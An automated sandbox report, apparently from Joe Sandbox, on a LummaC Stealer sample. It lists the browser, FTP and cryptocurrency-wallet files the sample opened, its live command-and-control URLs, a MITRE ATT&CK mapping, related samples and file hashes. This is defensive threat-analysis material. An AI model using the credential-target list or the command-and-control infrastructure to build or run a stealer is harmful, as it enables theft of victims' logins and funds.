Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe	Directory queried: C:\Users\user\Documents			Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Directory queried: C:\Users\user\Documents			Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: download.bin.exe PID: 5440, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	22 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	311 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	22 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
download.bin.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://traygullibalkerj.click/	0%	Avira URL Cloud	safe
https://traygullibalkerj.click/5	0%	Avira URL Cloud	safe
https://traygullibalkerj.click/&	0%	Avira URL Cloud	safe
traygullibalkerj.click	0%	Avira URL Cloud	safe
https://traygullibalkerj.click/api	0%	Avira URL Cloud	safe
https://traygullibalkerj.click/apif	0%	Avira URL Cloud	safe
https://traygullibalkerj.click:443/apiCEAF9E7737D9ECFd	0%	Avira URL Cloud	safe
https://traygullibalkerj.click/apite	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
traygullibalkerj.click	104.21.112.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
rabidcowse.shop	false		high
wholersorie.shop	false		high
traygullibalkerj.click	true	Avira URL Cloud: safe	unknown
framekgirus.shop	false		high
https://traygullibalkerj.click/api	true	Avira URL Cloud: safe	unknown
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://traygullibalkerj.click/5	download.bin.exe, 00000001.00000002.2928133938.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	download.bin.exe, 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://traygullibalkerj.click/	download.bin.exe, 00000001.00000002.2928261672.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, download.bin.exe, 00000001.00000002.2927901414.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://traygullibalkerj.click/apif	download.bin.exe, 00000001.00000002.2928245316.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://traygullibalkerj.click/&	download.bin.exe, 00000001.00000002.2928261672.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.microsoft.c	download.bin.exe, 00000000.00000002.1688842398.00000000015B6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://traygullibalkerj.click:443/apiCEAF9E7737D9ECFd	download.bin.exe, 00000001.00000002.2928133938.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	download.bin.exe, 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://traygullibalkerj.click/apite	download.bin.exe, 00000001.00000002.2927901414.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.112.1	traygullibalkerj.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583959
Start date and time:	2025-01-03 23:02:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	download.bin.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 322 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: download.bin.exe

Simulations

Behavior and APIs

Time	Type	Description
17:02:59	API Interceptor	8x Sleep call for process: download.bin.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://covid19.protected-forms.com/XQTNkY0hwMkttOEdiZmZ0V2RRTHpDdDNqUTROanhES0NBYmdFOG1KTGRSTUtrK3VMMzlEN1JKVVFXNUxaNGJOQmd1YzQ3ajJMeVdZUDU3TytRbGtIaFhWRkxnT0lkeTZhdy9xWEhjeFBoRXRTb2hxdjlVbi9iSk1qZytLQ0JxRjd4UmpOS3VUQ2lpOEZneTRoVmpzY2dyekR1WlhYOWVteVcrUXg0a2Y2aEU2ZEZwMVNId3R0U01RK3N3PT0tLVR0bDl1WEFUelg3K2VzTystLUxaMkFrZnU0UmJXRkR3aE5NRE9BOEE9PQ==?cid=2351432832	Get hash	malicious	KnowBe4	Browse	104.18.90.62
	hthjjadrthad.exe	Get hash	malicious	LummaC	Browse	104.21.85.66
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	http://www.cipassoitalia.it/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	188.114.96.3
	Mj6WEKda85.exe	Get hash	malicious	DCRat	Browse	104.21.12.142
	https://rfqdocu.construction-org.com/Q5kL4/	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44d	Get hash	malicious	Unknown	Browse	104.17.25.14
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	188.114.96.3
	m.txt.ps1	Get hash	malicious	Unknown	Browse	172.67.212.107

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	hthjjadrthad.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	HSBC_PAY.SCR.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.112.1
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	104.21.112.1
	nayfObR.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	7z91gvU.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.112.1
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	file.exe	Get hash	malicious	LummaC	Browse	104.21.112.1

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.985178100482398
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	download.bin.exe
File size:	1'139'712 bytes
MD5:	47bd83617560c80c7e805b546ea2a258
SHA1:	09daba42fcaba0481d72e26a201d4eb442a842b9
SHA256:	ec8cd0b52b6d8839d69c9ceb691cd5a92d183394b749c5ba354d31e124cc4557
SHA512:	1d916bb6927680a1b65c414a075caf2302a5375cad9a5d5be941a56c85a1f5996435a6dbdce8614964edd325b4530a926e506a043ebe5e8f942efd152a0f25b3
SSDEEP:	24576:vBg/P8B5+B25I3e3LxT3huxT5TXyV7Jir8XLLAO+:vBS0425IO1xu15ToEobL2
TLSH:	C535234FB34EDAE9CFA86339D56B464113219240A977D809E76A1BA7010739CBF407AF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.vg.................Z...........y... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x5179ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6776F826 [Thu Jan 2 20:33:42 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
